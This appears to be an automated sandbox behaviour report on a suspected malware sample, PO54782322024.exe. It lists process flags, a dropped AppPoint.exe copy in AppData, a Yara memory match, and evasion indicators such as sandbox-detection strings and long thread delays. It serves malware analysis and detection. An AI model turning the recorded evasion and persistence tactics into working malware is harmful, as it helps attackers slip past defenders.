                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: PO54782322024.exe PID: 6844, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                        Source: PO54782322024.exe, 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory allocated: 17F04530000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO54782322024.exeMemory allocated: 17F1DF10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeMemory allocated: 4DE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599757Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598668Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598442Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598311Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597640Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596874Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596184Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596077Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595968Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595778Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595653Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595528Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2345Jump to behavior
